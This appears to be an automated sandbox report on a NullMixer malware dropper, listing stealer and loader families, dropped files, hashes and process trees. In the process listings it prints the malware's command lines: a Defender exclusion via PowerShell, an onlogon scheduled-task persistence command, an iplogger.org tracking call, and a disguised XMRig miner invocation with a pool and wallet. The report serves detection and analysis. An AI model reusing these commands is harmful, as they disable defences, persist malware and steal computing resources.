Malware Analysis Report

2024-10-19 02:13

Sample ID 231231-ej4ygaecdq
Target 2737e2cab1e399c563fe0557683234fd
SHA256 f7f5898bbed2b677a52a031071110b8aebb4b3eba2669703f6dd60e6953dc2a2
Tags nullmixer privateloader redline risepro sectoprat smokeloader vidar xmrig 706 build1 pub6 backdoor dropper infostealer loader miner persistence rat stealer trojan aspackv2
Score 10/10

Analysis Overview

Score 10/10

SHA256 f7f5898bbed2b677a52a031071110b8aebb4b3eba2669703f6dd60e6953dc2a2

Threat Level: Known bad

The file 2737e2cab1e399c563fe0557683234fd was found to be: Known bad.

Malicious Activity Summary

Vidar

RedLine payload

RedLine

RisePro

xmrig

SectopRAT

SectopRAT payload

PrivateLoader

NullMixer

SmokeLoader

Vidar Stealer

XMRig Miner payload

Loads dropped DLL

ASPack v2.12-2.42

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Program crash

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported

2023-12-31 03:59

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-31 03:59

Reported

2024-01-02 03:57

Platform

win7-20231215-en

Max time kernel

5s

Max time network

170s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"

Signatures

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

xmrig

miner xmrig

Vidar Stealer

stealer
XMRig Miner payload

miner
Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe N/A
N/A N/A C:\Windows\system32\DllHost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1820 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2140 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
PID 2960 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe

"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cfbebc6111c611.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\45523e3cdecd50c9.exe

45523e3cdecd50c9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe

cc8d5bf9d8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe

52748077bb26.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\dc8baab07.exe

dc8baab07.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe

227af833e4e9ad4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe

23cfc2c69e2b5.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe

cfbebc6111c611.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe

f35fb6370e5673.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\0c879100232.exe

0c879100232.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 52748077bb26.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c dc8baab07.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f35fb6370e5673.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 428

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0c879100232.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167716 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 972

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS61DF.tmp\Install.cmd" "

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:275457 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network


Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 05cd842f936d714465cb73287b0ef83d
SHA1 b39bee28bc4c42bd086a8ba1c8fd5560a26ca881
SHA256 ee6b821ec26751ccb3e14e3ebc7aae737298d63a18ac2b27f6a295ef108b8372
SHA512 789868c466a6a7165f8de5d8982c21549b5a801a356666c89680865b692f9b1ee7826b29fa56ea73096fb20ec687440d64be6cdc587947351d12353c7bb8e2b7

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 b15d3c878a51f11190d6886cb3ab8b73
SHA1 5775318b9b4a44eec3fbca27a2b8d165e2ab0308
SHA256 8c2fe5a4625e7dc1928d5ade9053d6ad655fb1d47beead8e5642493fc7f44beb
SHA512 8937ac421269338abe25b3ed8797ff40e827ee5c69c3d8e9e5f40e2b7813b6cf5d7b126fa974e2e50f393efe24381e20b4d7cb83a668b7c046e6f180e5995f9a

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 f3978f536f40d2d434c1d85e7f5e330b
SHA1 fbaed8394314bcfb835f6e7bc7dbbacf225db80a
SHA256 78be629934adc57181021d05c175ef7fbe6e3849fb97fb8fc5e3cbee1144afad
SHA512 0cd65d47e12ee1697407aee1046a5a1724ef3accf60b78706efd2569244108b6163adc2f0c287ac5707aa96edf939737a9facffa5041b6befebb15ccc79a95ad

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 da7ba1e73dbcaa51469180211a111663
SHA1 3c300c8c95c7c881b7914ff9f1eeb4bdd3bae03f
SHA256 0cdff899355957cc2eab72a9cfebb49b7759c9d6099a1f657aafbde0c528f26d
SHA512 74ed715e7afc8d326d475198b5876fa28103545a4b1dcea858d4bc7ecd99ca0e99aab8c14fe5cac386ed13f632f3376c33839508227e20a75e3eefa9c6d9af85

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 5af64b02529038aa5e766dcff4ece466
SHA1 b5dd26e65e0191bb38bc58a3686a23003a41c2d8
SHA256 618024b4c0c8d3ca9924b8536804b83760e2e1140d8e400bf972e8ac79c7facb
SHA512 a2186d277238c43fe781dd273400bba2cd31f7a7dd24d5d8b6bd74b5e76eeacc18b54434952362a2b195351937c4303b7c01eefb0d79da8482cc6cda434c3107

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 0a7f5ccfee694282b3c0ffecf42fb5b2
SHA1 693ccc5ed5712d143f334e009c2fdc30eb67112d
SHA256 a3bd0a2d0ac227c60f68311863463c86ed23279dde0685152ec8581ba5a27f2a
SHA512 233a94eb25bb81bca975c5bfa0d236a967d8ab3ef7dec18dcb5a31437946c5715f59f927a2d646636acca1faa372b86dcb725c976b2ecaa9cadf605be1dd3d72

memory/2960-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-52-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2960-54-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2960-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-55-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2960-60-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\dc8baab07.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe

MD5 22272aaee3f0ff421c0a2d5abeed26c9
SHA1 f7f6b229e4da0139102fbb49015aa894b99829e3
SHA256 dcfe57e3b65ddfb62112935f3dd640379828a83533bea0e7badd3a3870f0fc34
SHA512 f351105b7aed518ac8ab80d61fe5baf8ba37b4c689e560e4ad147a6c21c4dcf98e47816e65aa47cab87dcd9115bb2b071b71344a569979ee1413bccd84122207

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\45523e3cdecd50c9.exe

MD5 181f1849ccb484af2eebb90894706150
SHA1 45dee946a7abc9c1c05d158a05e768e06a0d2cdc
SHA256 aeb2d203b415b00e0a23aa026862cec8e11962fdb99c6dce38fb0b018b7d8409
SHA512 a87485005ca80e145a7b734735184fa2d374a7f02e591eec9e51b77dc2a51be7f8198ce5abfceb9546c48bf235a555f19d6c57469975d0b4c786b0db16df930c

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe

MD5 dea4fe16fc93c5de689cad2450123f27
SHA1 b1358b24f4f0769b7dd09c4db1633e38829bf756
SHA256 39e0d892a41c3488275e7e048838d1f9dc9602435f7a8d1f5fdbc54973c5a5fd
SHA512 f0e688558bbbb357c0afdb6f85a6a6898b7ce4e35fa13e3b55df5229e22035b66558d8795adafb99ea860e1789afedfd563743ba4f264b924ac844fc59eac506

memory/1912-135-0x0000000000010000-0x0000000000018000-memory.dmp

memory/1576-134-0x0000000000AA0000-0x0000000000ACE000-memory.dmp

memory/2308-137-0x0000000001370000-0x00000000014B2000-memory.dmp

memory/1476-136-0x0000000000160000-0x000000000024E000-memory.dmp

memory/1912-138-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1576-141-0x00000000002C0000-0x00000000002C6000-memory.dmp

memory/2648-140-0x00000000001D0000-0x00000000001D9000-memory.dmp

memory/2648-139-0x00000000002E0000-0x00000000003E0000-memory.dmp

memory/2960-62-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2960-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2960-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1576-142-0x00000000002D0000-0x00000000002F2000-memory.dmp

memory/1576-145-0x00000000002F0000-0x00000000002F6000-memory.dmp

memory/1824-147-0x0000000000360000-0x00000000003FD000-memory.dmp

memory/1824-146-0x0000000003470000-0x0000000003570000-memory.dmp

memory/2648-144-0x0000000000400000-0x00000000032F8000-memory.dmp

memory/2960-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1528-159-0x000000013F110000-0x000000013F120000-memory.dmp

memory/1824-161-0x0000000000400000-0x000000000334B000-memory.dmp

memory/1528-162-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1576-163-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

memory/1912-164-0x000000001AFD0000-0x000000001B050000-memory.dmp

memory/2960-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2960-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1576-165-0x000000001AF70000-0x000000001AFF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA21B.tmp

C:\Users\Admin\AppData\Local\Temp\TarA25C.tmp

C:\Windows\winnetdriv.exe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\Local\Temp\7zS61DF.tmp\Install.cmd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-31 03:59

Reported

2024-01-02 03:57

Platform

win10v2004-20231215-en

Max time kernel

0s

Max time network

106s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"

Signatures

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Vidar Stealer

stealer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe

"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 52748077bb26.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\0c879100232.exe

0c879100232.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2544 -ip 2544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 556

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167719 0

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe

"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe" -a

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe

23cfc2c69e2b5.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cc8d5bf9d8.exe

cc8d5bf9d8.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cfbebc6111c611.exe

cfbebc6111c611.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\52748077bb26.exe

52748077bb26.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\45523e3cdecd50c9.exe

45523e3cdecd50c9.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\f35fb6370e5673.exe

f35fb6370e5673.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\227af833e4e9ad4.exe

227af833e4e9ad4.exe

C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\dc8baab07.exe

dc8baab07.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c dc8baab07.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f35fb6370e5673.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0c879100232.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cfbebc6111c611.exe

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS1807.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb469e46f8,0x7ffb469e4708,0x7ffb469e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

